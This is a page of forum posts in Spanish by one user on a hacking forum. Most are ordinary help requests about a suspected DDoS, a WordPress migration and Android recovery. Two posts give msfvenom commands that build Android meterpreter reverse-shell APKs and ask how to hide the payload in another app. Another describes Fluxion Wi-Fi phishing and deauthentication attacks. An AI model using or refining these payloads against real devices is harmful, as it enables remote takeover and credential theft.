elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: [1] 2
1  Comunicaciones / Redes / Han cortado mi Internet completamente a través de un videojuego online en: 24 Agosto 2018, 20:56 pm
Hola, no sabía muy bien dónde publicar esta duda, como es un problema con mi red pensé que sería el lugar adecuado. Estoy buscando ayuda, pero como dato también es interesante:

Hace unos minutos estaba jugando una partida de Ps3 online, al GTA V concretamente, no se si lo sabéis, pero hay cantidad de modders y mod menús que hacen un suplicio jugar online,  he de decir que yo mismo instalé uno, para recuperar una cuenta que me dejaron inutilizable, mi nivel en el juego quedó en números negativos O.o...

No me ando más por las ramas: apareció un dichoso modder, que me spameaba con mensajes, donde ponía mi iP, la ciudad donde vivo, mi proveedor de Internet... Luego "Internet off" una y otra vez... Me he asustado porque se ha cerrado la sesión en psn, y al iniciar el juego offline ¡seguía matandome! Incluso al reiniciar la play.

Me he puesto a buscar una solución en Internet y... Sorpresa! El WiFi no va... Ni para la play ni para nadie.

Le he dado a reiniciar el router, he desconectado la play, y como no funcionaba he reiniciado el router de fábrica... Pero nada :'(

En la play 3 ponía que podía ser un error con el dns, pero si de alguna forma cambió la configuración del router al restaurarlo debería arreglarse no?

Alguien sabe que puede estar pasando? Gracias

EDITO, YA HA PARADO:
Bueno, al final decidí desconectar el router y dejarlo así unas horas, después de eso todo ha vuelto a la normalidad, por lo menos con el Internet de casa, la play aún ni la he encendido xD.

Se me ocurre que ha podido ser un ataque ddos, como hice reset al router y desconecté la Ps3 (pensé que podría ser la causa) y no influyó en nada, debe ser algo externo ¿verdad? además es@ tipej@ tenía mi IP.

Mis preguntas ahora son las siguientes:
¿Como puedo proteger mi hogar de ataques como ese?
Y ¿debería preocuparme que el modder tenga mi IP?

2  Seguridad Informática / Análisis y Diseño de Malware / apk creada con msfvenom se detiene en: 16 Marzo 2017, 19:04 pm
Hola a tod@s, he estado jugando un poco con msfvenom y creando una aplicación para android, no he tenido ningún problema asta que he instalado la app en el teléfono, cada vez que mando cualquier orden con la consola la aplicación se detiene, en la pantalla del teléfono se ve "la aplicación MainActivity se a detenido de forma imprevista" y se cierra (lógico) la sesion que se había creado....

He probado cambiando el puerto y la ip, y haciéndolo con dos comandos;

Código:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=1554 -o /root/Descargas/maliciosus.apk
y tambien
Código:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=7853 R > /root/Desktop/mi_virus_android/maliciosus.apk 

Con las dos pasa lo mismo, la aplicacion funciona asta que introduzco cualquier comando, despues se detiene.

¿Que puedo estar haciendo mal?

Otras preguntas....

Hay alguna forma de introducir el codigo malicioso dentro de otra app? Me dijeron que msfvenom podía hacerlo, pero no encuentro nada al respecto.

Y si no es asi, se puede cambiar el icono del apk y el nombre una vez instalada? MainActivity no me gusta
3  Programación / Desarrollo Web / Pagina web redireciona a "misitio.com/wp-admin/install.php" en: 10 Marzo 2017, 15:54 pm
Hola a todos, cree otro tema anteriormente para pedir ayuda al respecto, pero como se mas bien nada de esto  :xD quizás no plantee bien las preguntas;
Un amigo me pidió ayuda para migrar una pagina de un servidor a otro, por lo visto ya lo habían intentado antes, pero algo hicieron mal y la pagina denegaba el acceso. Solucionamos ese problema cambiando los permisos de config.php.
Luego tuvimos el problema "no se pudo encontrar la base de datos", asi que hubo que modificar el archivo config.php de nuevo, y modificar el nombre y las credenciales de conexión de la db, pues ahi tuve que hacer algo mal, por que ahora cada vez que quieres entrar a la pagina te redirecciona a "misitio.com/wp-admin/install.php".
He leido un poco al respecto y dicen que es un problema con la db, tengo una copia de las bases de datos, pero no tengo ni idea de cual es cual ni que debo hacer con ellas, son 4 y una de ellas es muy grande para subirlas a phpmyadmin  :-\,(13mb el maximo son 2) he hecho todo lo que un novato haría, subirlas todas y probar una por una  :rolleyes:, me da un error al hacerlo; se a devuelto un conjunto de caracteres vacío (leí que tenia que podía causarlo el no estar haciendo una consulta mysql, no se que es y mucho menos hacerla). Repararlas, nada, cambiar en el config.php el  DB_HOST a "mysql", 127.0.0.1, al final lo deje como estaba "localhost"....
Me voy quedando sin ideas, y se que por mi ignorancia se me esta escapando algo muy básico, por eso pido consejo aquí, agradecería ayuda al respecto, ya son 5 meses que la pagina de mi amigo esta caída  :-\, no se si estare planteando bien el problema, si no es así comentad lo que no he explicado bien y lo intentare explicar mejor. Dejo el link de la pagina por si quereis hechar un ojo al problema en primera persona
http://borneoeventos.com
4  Programación / Desarrollo Web / Ayuda para migrar pagina web a un servidor en: 9 Marzo 2017, 15:50 pm
Hola a  tod@s, un amigo me a pedido ayuda para migrar una pagina web a un servidor gratuito, ya le he dicho que ni idea :huh:, pero que aquí podría buscar consejo y podía intentarlo, así que ahí va;
Me a dado un archivo zip llamado BORNEO.zip, este contiene dos carpetas llamadas BBDD, y FTP, también el acceso a phpmyadmin.

Se que doy poca información, pero no se que mas podría seros útil  :P, me ayudaría que me digan que es cada cosa por ejemplo, y que es lo que me hace falta saber y si esta muy lejos de mi alcance.

Gracias de antemano :)
5  Seguridad Informática / Hacking Wireless / Dudas con Fluxion, el "nuevo Linset" en ubuntu 14.06 en: 3 Febrero 2017, 20:27 pm
Hola a todos, he estado jugando un poco con Fluxion, la ingeniería social me llama mucho la atención ;-) Pero todavía no he conseguido empezar un ataque, ni con un fake app, ni tampoco wps.
El problema con el fake app es el siguiente;

No captura en Handshake, lo he intentado con aircrak-ng y con pyrit. He pensado por que podría ser; Cuando empieza cualquier ataque para echar a los usuarios de la red, no deja volver a reconectar, el ataque nunca termina  :huh:, con Linset los ataques tenían un tiempo limitado ¿Puede ser el problema?

He intentado conseguir el Handshake deteniendo el ataque de forma manual (cierro ventanita) pero cuando me conecto de nuevo a la red no me lo detecta.

El problema con el ataque wps es este

A la hora de elegir una interfaz para el ataque, selecciono wlan1, pero dice que no encuentra el dispositivo. Me deja acceder a los menús posteriores a este, pero no puede iniciar ningún ataque

He intentado solucionarlo apagando la red inalámbrica antes de empezar el ataque, para que a la hora de necesitar la interfaz esta estuviese libre. Eso me soluciono un problema, ya que mi red esta en el canal 11, y al escanear las redes para el ataque con el app falso solo detectaba las redes en los canales 1 y 2, si alguien tiene ese problema que desconecte la red inalámbrica antes de empezar, pero sigue sin solucionarme el problema con la interfaz, es muy raro, por que escaneo con ella, pero para esto no me deja usarla.

Que puedo estar haciendo mal?  ;D todo el mundo habla maravillas de este script, no creo que sea el problema...
¿Quizás no es compatible con ubuntu? Se creó para Kali Linux, pero aunque es mas completo que Linset, utiliza herramientas que si son compatibles (Creo)
¿No es compatible con mi tarjeta? Con Linset no hubo problema, pero quizás Fluxion no sea igual...
¿Lo estoy usando mal? A pesar de ser extremadamente sencillo la puedo estar cagando en algo... :xD

¿Alguien puede echarme una mano?

6  Programación / Desarrollo Web / ¿Script anti pop-up? ¿es posible? en: 22 Enero 2017, 08:53 am
      Hola a tod@s! Cuanto tiempo sin pasar por aquí... :silbar: Acudo como siempre en busca de ayuda.  ;)

      Antes de nada siento si la pregunta esta mal planteada o no esta donde debería estar, tenía dudas sobre ambas cosas jeje.

      Sin mas preámbulos aquí va mi duda;
      Recientemente he creado un blog, donde cuelgo películas de estreno, series y aplicaciones, uno de los reclamos principales de mi blog es que no tiene publicidad pop-up molesta  ;-), y eso me llena de orgullo, ya que muy pocos hacen esto, y gratis y sin registro menos. El problema aparece cuando quiero publicar una película con un código embed, ya que el reproductor aparece en mi blog ya con publicidad, y eso arruina completamente la ventaja principal que mi sitio tiene respecto a los demás...

     De modo que me pregunto si hay alguna forma de evitar, con un código html, que esas ventanas se abran, y así poder conservar ese reclamo.

     No se si lo que pido es posible  :P, pero no me puedo quedar sin intentarlo

     Agradecería cualquier ayuda al respecto, desde un código  ;-), asta un "eso es imposible" :-(

     Mi sitio pertenece a blogger, creo que no importa, pero por si acaso.
7  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / problema con cwm recovery, no inicia recovery (ANDROID) (SOLUCIONADO!!) en: 8 Noviembre 2016, 13:55 pm
Hola a todos, cuanto tiempo sin pasar por el foro  :) regreso y lo hago con un problema, :rolleyes: no se si esta sera la sección adecuada, pero ahi va;
He instalado el cwm recovery en mi orange yumo, todo fue bien asta que intente entrar en el, el telefono se queda con la pantalla pillada en el logotipo de orange y no hace nada, asi que decidi entrar en modo fastboot e instalar otro recovery, ¡¡pero tampoco inicia!!  :huh:, tampoco lo hace en modo update, pero en modo normal lo hace sin problemas.
He de decir que he tocado bastante el SO del telefono, pero asta ahora no me habia dado ningun problema. Me he quedado en blanco y no se que deberia hacer... Agradecería cualquier ayuda
Gracias de antemano!!  :-*
EDITO: He conseguido entrar en el bootloader desde el oredenador, reinstalaré el recovery a ver que tal...
EDITO: Problema resuelto, era un problema de incopativilidad, despues de buscar un popco encontre el recovery compatible com mi telefono, lo dejo aqui para que si alguien con un orange yumo tiene el mismo problema lo pueda descargar  :)
http://d-h.st/gG7
No me habeis ayudado ya que no he dejado tiempo, pero aun asi, gracias a este foro por existir  ;-)
8  Seguridad Informática / Bugs y Exploits / problema con payload en android en: 26 Junio 2016, 16:02 pm
Hola a todos, tengo un problema al instalar un payload en un teléfono android, he generado al payload con msfvenom y no se si lo he hecho de la forma correcta, dejo el comando:
Código:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk

También le he añadido:
Código:
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk
Me salen algunas cosas sin rellenar,
Código:
No Arch selected, selecting Arch: dalvik from the payload                                                                                            
No encoder or badchars specified, outputting raw payload  
pero en un tutorial que he visto le vasta con el primer comando para crear una sell remota.
Este es el proceso:
Msfvenom genera el payload con la extensión .apk, lo paso a  un soy experia tipo (reliquia :laugh:) y pongo handler en escucha, cuando voy a instalar el archivo .apk me sale el instalador, muestra los permisos, le doy a aceptar y sale como si se instalase, pero dice "la aplicación no está instalada" y sale de la instalación sin que el handler pille nada.

Que puedo estar haciendo mal? Lo mas seguro es que sea lo que me advierte el propio msfvenom, pero en el tutorial no tenían ningún problema sin esos comandos.
9  Sistemas Operativos / GNU/Linux / no puedo crear USB booteable con win 10 (desde linux) en: 21 Junio 2016, 19:46 pm
Hola, siento molestar con un tema tan simple, pero me está siendo imposible instalar windows 10 en mi ordenador, resulta que unetbootin, que antes aceptaba crear usb booteables tanto de linux como windows, ahora solo soporta linux, he intentado con barias aplicaciones de windows con wine, pero cuando no es un error es otro, me a sido imposible conseguir ninguna aplicación que funcione bajo wine, así que me he decidido a hacerlo manualmente, extraer el iso en el usb y hacerlo booteable con gparted, pero sorpresa!  :o windows no a terminado de complicar las cosas aún, extraigo el iso de win 10 y lo unico que obtengo es un archivo de texto llamado "README.TXT" con el siguiente texto:
Citar
This disc contains a "UDF" file system and requires an operating system
that supports the ISO-13346 "UDF" file system specification.
No puedo extraerlo  :P
Necesito instalar win 10 por que es el mejor para manejar visual Basic 2015, otros no serian compatibles. Que puedo hacer?? :huh:
PD:
Utilizo wifislax como sistema operativo
10  Foros Generales / Sugerencias y dudas sobre el Foro / Mensajes privados ordenados en: 18 Junio 2016, 21:33 pm
Hola, que tal, bueno soy bastante nuevo y no se si me he ganado el derecho a pedir algo, pero como esto es un foro libre allá voy.  ;D
Me gustaría pedir que los mensajes privados se guarden en carpetas por nombre de usuario, es decir, que no salgan unos encima de otros, de esa forma es mas fácil leerlos y encontrar el que quieras, no se si será posible.
Es lo único que cambiaría del foro, todo lo demás perfecto, gracias de antemano  :)
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines